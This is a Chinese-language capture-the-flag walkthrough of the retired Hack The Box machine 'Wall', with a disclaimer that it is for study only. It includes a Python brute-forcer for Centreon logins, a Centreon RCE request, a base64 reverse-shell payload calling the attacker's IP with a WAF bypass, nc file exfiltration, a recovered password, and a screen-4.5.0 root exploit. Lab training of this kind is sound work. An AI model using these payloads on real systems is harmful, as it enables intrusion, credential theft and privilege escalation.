HTB-靶机-Wall

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.157

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

信息枚举收集
https://github.com/codingo/Reconnoitre 跟autorecon类似
autorecon 10.10.10.157 -o ./Wall-autorecon

sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.157
或者

sudo masscan -p1-65535,U:1-65535 10.10.10.157 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '
' ',' | sed 's/,$//')
sudo nmap -Pn -sV -sC -p$ports 10.10.10.157

访问IP地址的80端口显示默认的apache页面，进行目录爆破

sudo gobuster dir -u http://10.10.10.157 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php

访问得到的目录monitoring发现显示401认证，通过测试更改请求方法为POST可以成功绕过认证，根据显示的信息可以访问http://10.10.10.157/centreon 得到一个登录页面，centreon是个分布式监控系统，可参考：https://www.cnblogs.com/flytor/p/11440809.html

更改为post请求方法

发现响应200，显示信息提示存在一个url地址/centreon 正常使用get请求重放过去看看

显示一个登录框，网上搜索一把确认centreon是一套监控系统，此监控系统存在默认口令admin/centreon

可参考：https://www.tenable.com/plugins/nessus/80225 但是使用此默认账户密码登录失败了，同时查看burpsuite的抓包请求，发现centreon存在centreon_token认证，没错附带的token都不一样，所以常规的方法不能进行暴力破解，可以通过python代码进行暴力破解，当然也可以使用burpsuite的宏功能进行爆破，我这就是有python进行爆破

准备使用的爆破密码字典
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-passwords-shortlist.txt

爆破的python代码

#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup

url = 'http://10.10.10.157/centreon/index.php'
s = requests.session()

def sendRequests(username, password):
    page = s.get(url)
    soup = BeautifulSoup(page.content, 'html.parser')
    token = soup.find('input', attrs = { 'name' : 'centreon_token' })['value']
    data = { 'useralias' : username, 'password' : password, 'submitLogin' : 'Connect', 'centreon_token' : token }
    response = s.post(url, data = data)

    if 'incorrect' not in response.text:
        print("Credentials found {}:{}".format(username, password))

with open('top-passwords-shortlist.txt') as wordlist:
    for word in wordlist:
        password = word.rstrip()
        print("[*] Trying {}".format(password))
        sendRequests('admin',password)

下面是执行的结果

kali@kali:~/Downloads/htb/wall$ python3 centreon.py
[*] Trying password
[*] Trying 123456
[*] Trying 12345678
[*] Trying abc123
[*] Trying querty
[*] Trying monkey
[*] Trying letmein
[*] Trying dragon
[*] Trying 111111
[*] Trying baseball
[*] Trying iloveyou
[*] Trying trustno1
[*] Trying 1234567
[*] Trying sunshine
[*] Trying master
[*] Trying 123123
[*] Trying welcome
[*] Trying shadow
[*] Trying ashley
[*] Trying footbal
[*] Trying jesus
[*] Trying michael
[*] Trying ninja
[*] Trying mustang
[*] Trying password1
Credentials found admin:password1

根据博客信息，可以知道要想执行命令需要请求下面uri地址且使用POST请求方法，并带上body参数
请求的uri地址
/centreon/include/configuration/configGenerate/xml/generateFiles.php

博客地址：https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/

具体请求参数

POST http://10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php HTTP/1.1
Host: 10.10.10.157
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.157
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.157/centreon/main.get.php?p=60901&o=c&server_id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=16f08s82qv7rui4vjdm8hbr6jc
Connection: close

debug=true&generate=true&poller=1

发现响应信息成功执行id命令，开始通过base64配置反弹shell，测试发现有WAF，使用{IFS}进行绕过

echo 'bash -i >& /dev/tcp/10.10.14.16/8833 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNi84ODMzIDA+JjEK

使用反弹shell代码配置centreon进行反弹shell

echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNi84ODMzIDA+JjEK|base64${IFS}-d|bash;

然后使用burpsuite进行重放方面的请求包，即可触发反弹shell

通过在目标靶机上信息搜集，发现一个备份文件backup

把这个backup文件传到本地kali

kali：nc -lvnp 9933 > backup.tgz
靶机：nc 10.10.14.16 9933 < /opt/.shelby/backup

目标靶机的backup文件是python字节码，可以通过uncompyle6进行反编译
安装
sudo pip3 install uncompyle6
编译
uncompyle6 backup.pyc

kali@kali:~/Downloads/htb/wall$ uncompyle6 backup.pyc
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.5 (default, Aug  2 2020, 15:09:07)
# [GCC 10.2.0]
# Embedded file name: backup.py
# Compiled at: 2019-07-30 22:38:22
import paramiko
username = 'shelby'
host = 'wall.htb'
port = 22
transport = paramiko.Transport((host, port))
password = ''
password += chr(ord('S'))
password += chr(ord('h'))
password += chr(ord('e'))
password += chr(ord('l'))
password += chr(ord('b'))
password += chr(ord('y'))
password += chr(ord('P'))
password += chr(ord('a'))
password += chr(ord('s'))
password += chr(ord('s'))
password += chr(ord('w'))
password += chr(ord('@'))
password += chr(ord('r'))
password += chr(ord('d'))
password += chr(ord('I'))
password += chr(ord('s'))
password += chr(ord('S'))
password += chr(ord('t'))
password += chr(ord('r'))
password += chr(ord('o'))
password += chr(ord('n'))
password += chr(ord('g'))
password += chr(ord('!'))
transport.connect(username=username, password=password)
sftp_client = paramiko.SFTPClient.from_transport(transport)
sftp_client.put('/var/www/html.zip', 'html.zip')
print '[+] Done !'
# okay decompiling backup.pyc

根据上面反编译的代码直接使用python交互的方式提取密码

kali@kali:~/Downloads/htb/wall$ python
Python 2.7.18 (default, Apr 20 2020, 20:30:41)
[GCC 9.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> password = ''
>>> password += chr(ord('S'))
>>> password += chr(ord('h'))
>>> password += chr(ord('e'))
>>> password += chr(ord('l'))
>>> password += chr(ord('b'))
>>> password += chr(ord('y'))
>>> password += chr(ord('P'))
>>> password += chr(ord('a'))
>>> password += chr(ord('s'))
>>> password += chr(ord('s'))
>>> password += chr(ord('w'))
>>> password += chr(ord('@'))
>>> password += chr(ord('r'))
>>> password += chr(ord('d'))
>>> password += chr(ord('I'))
>>> password += chr(ord('s'))
>>> password += chr(ord('S'))
>>> password += chr(ord('t'))
>>> password += chr(ord('r'))
>>> password += chr(ord('o'))
>>> password += chr(ord('n'))
>>> password += chr(ord('g'))
>>> password += chr(ord('!'))
>>> password
'ShelbyPassw@rdIsStrong!'
>>>

使用这个密码ShelbyPassw@rdIsStrong! 直接ssh登录目标靶机

sshpass -p 'ShelbyPassw@rdIsStrong!' ssh -oStrictHostKeyChecking=no shelby@10.10.10.157

成功登录到目标靶机之后查找4000权限的二进制文件

shelby@Wall:~$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/screen-4.5.0
/bin/fusermount
/bin/su
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/eject/dmcrypt-get-device
shelby@Wall:~$

发现经典的screen-4.5.0漏洞，可直接提权root
https://www.exploit-db.com/exploits/41154

直接下载下来传到目标靶机上去提升到root权限

wget https://www.exploit-db.com/raw/41154
dos2unix 41154
cp 41154 screenpwn.sh
scp screenpwn.sh shelby@10.10.10.157:/tmp/
chmod +x screenpwn.sh
./screenpwn.sh